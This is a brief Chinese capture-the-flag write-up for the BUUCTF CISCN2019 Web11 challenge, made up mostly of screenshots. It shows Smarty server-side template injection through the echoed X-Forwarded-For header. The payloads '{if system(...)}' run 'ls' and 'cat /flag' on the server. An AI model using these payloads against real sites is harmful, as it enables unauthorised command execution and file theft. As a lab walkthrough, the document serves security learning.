![BUUCTF:[CISCN2019 华东南赛区]Web11_.net](https://file.cfanz.cn/uploads/png/2023/06/19/22/Bea8T4H2A8.png "在这里插入图片描述")
![BUUCTF:[CISCN2019 华东南赛区]Web11_CISCN2019_02](https://file.cfanz.cn/uploads/png/2023/06/19/22/a7Uc93DN64.png "在这里插入图片描述")
注意到了banner中信息说是smarty,并且将XFF输出到页面
![BUUCTF:[CISCN2019 华东南赛区]Web11_.net_03](https://file.cfanz.cn/uploads/png/2023/06/19/22/Z6YX62Fb6R.png "在这里插入图片描述")
直接尝试Smarty模板注入
{$smarty.version}![BUUCTF:[CISCN2019 华东南赛区]Web11_.net_04](https://file.cfanz.cn/uploads/png/2023/06/19/22/4WA7ecD1e0.png "在这里插入图片描述")
Smarty3官方手册:https://www.smarty.net/docs/zh_CN/language.function.if.tpl
![BUUCTF:[CISCN2019 华东南赛区]Web11_.net_05](https://file.cfanz.cn/uploads/png/2023/06/19/22/15N81d4485.png "在这里插入图片描述")
{if system('ls -lha /')}{/if}![BUUCTF:[CISCN2019 华东南赛区]Web11_BUUCTF_06](https://file.cfanz.cn/uploads/png/2023/06/19/22/44c9C4D3Z2.png "在这里插入图片描述")
{if system('cat /flag')}{/if}![BUUCTF:[CISCN2019 华东南赛区]Web11_BUUCTF_07](https://file.cfanz.cn/uploads/png/2023/06/19/22/a478eHKb4R.png "在这里插入图片描述")
BUUCTF:[CISCN2019 华东南赛区]Web11
阅读 76
2023-06-19
相关推荐
精彩评论(0)
0 0 举报